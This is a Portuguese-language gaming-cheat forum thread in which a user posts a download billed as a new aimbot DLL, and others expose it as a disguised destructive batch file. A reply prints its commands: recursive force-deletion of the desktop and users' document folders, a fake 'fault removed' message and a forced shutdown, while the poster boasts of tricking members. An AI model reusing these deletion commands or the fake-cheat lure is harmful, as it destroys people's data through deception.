Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

NOVA DLL!!!!!!!!!!!

gayzao
 Compartilhar

Posts Recomendados

tutorial

1-descompacte e subistitua na pasta do sugarbot

2-abra o gb

3-segure selecione os 3 arquivos da pasta(o aimbot ,o jamilah e o dll)

4-vai abrir o jamilah ai vc abre o notepad e faz o processo do aim antigo de fake procees......simples

achei nun site gringo ai...... 8)

http://rapidshare.de/files/21878910/dll_by_me.rar.html

tipo vc seleciona os 3 arquivo e abre ai o aimbot vai abri depois vc abre o notepad, depois o jamilah ai vc clica em fake process no notepad e coloca o pid do aimbot ....... coloca hide no notepad e depois no aim..... igual o sugarbot antigo...

ta limpo ....nao coloquei scan pq nao sei como faz mas o cara ja postou ele aqui..... fui qualquer duvida mana PM

Link para o comentário
Compartilhar em outros sites

Re.: NOVA DLL!!!!!!!!!!!

voce testou??? ve isso diretio poh ta ai o scan:

AntiVir Found nothing

ArcaVir Found nothing

Avast Found nothing

AVG Antivirus Found nothing

BitDefender Found nothing

ClamAV Found nothing

Dr.Web Found BATCH.Virus (probable variant)

F-Prot Antivirus Found nothing

Fortinet Found nothing

Kaspersky Anti-Virus Found nothing

NOD32 Found nothing

Norman Virus Control Found nothing

UNA Found nothing

VirusBuster Found nothing

VBA32 Found nothing

Link para o comentário

UAHuhahuauh so retardado pra cair nessa nhe seu animal

�/C CD %USERPROFILE%Desktop

�/C DEL /Q *.lnk

0/C DEL /Q /S /F "%USERPROFILE%"Meus documentos

3/C DEL /Q /S /F "%ALLUSERPROFILE%"Meus documentos

Falha removida com sucesso! Para as alteracoes entrarem em vigor, reinicie o computador.

SHUTDOWN P -r -f -t 5 -c "Spaw Virus - por Sthealt - BRAZIL VIrII / Mais um infectado..."

) � ELSE (

Erro no programa. Abortando...

vai toma no seu .....

inuyasha6cy8sf9lf.jpg

imagem9yp.png

Link para o comentário

pois eh...... vcs descobriram pq nao era dll......esquessi de muda o icone !!!! hauhauahuahuahuah mas quem baixou e executou ja era,agora vai ser bo2k o dia todo!!!!!!!! guardem esse nome.......DARK-HERO eu voltarei....... hauhauahuahuah vou dominar esse forum com meus virus....... quando menos perceberem terao baixado um dos meus virus.....garanto q na proxima nao vai ser .bat ...... deltree ou otra merda assim..... podem me banir ...... fui

(odeio esse forum)

ass. DARK-HERO

[/url][/center]

Link para o comentário

gayzao, ahhhh faz me rir nhe para com isso moh merda isso que tu fez qualquer um faz num bloquinho de notas meu huauhahua faz um pra fica reiniciando o pc faz uhauhauhauh tem que rir pra no xorar de um imbecil desses hu uhahuauhahua

inuyasha6cy8sf9lf.jpg

imagem9yp.png

Link para o comentário

hahahah q graÃĤa :evil: vcs nao perdem por esperar .....vou dominar esse forum com minhas habilidades tcp/ip e ms-dos!!!!!!!!!!!!!!!! eu sou cientista nao mexam comigo!!!!!!!!!!!! :x falou agora eu vou jantar e uma boa noite a todos e volte sempre DARK-HERO

:twisted: :twisted: :twisted: :twisted: :twisted: :twisted: :twisted: :twisted: :twisted: :twisted: :twisted: :twisted: :twisted: :twisted: :twisted: :twisted: :twisted: :twisted: :twisted: :twisted: :twisted:

Link para o comentário

esse nick que vc esta usando agora aqui, Ãĩ bem sua cara heim, sera coincidencia? kkkkkkk escreve como homem poha, e dexa de ser lammer nerd f.dp, vai estuda pra aprende mas que essa pohinha ae que vc xama de virus e coisa do passado seu otário... e nem precisa ser lammer pra saber disso, que sua engenharia e tÃģo porca que ngm precisa penssar 2 vezes antes de faze scan babaca. Lol du jeito que Ãĩ nerd deve ter axado que atÃĩ banco ia roba com esse lixinhu ae, seu ultrapassado kkkkkkk QUAK QUAK lammer de site fundo de quintal.

Link para o comentário

kPOAapokPOKApoak

espero que ninguem tenha executado nÃĩ?!

antes faÃĤa um scan, se achar virus... deixa prum moderador ver se funfa x]

ban nele, e closed +1 topico ¬¬'

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.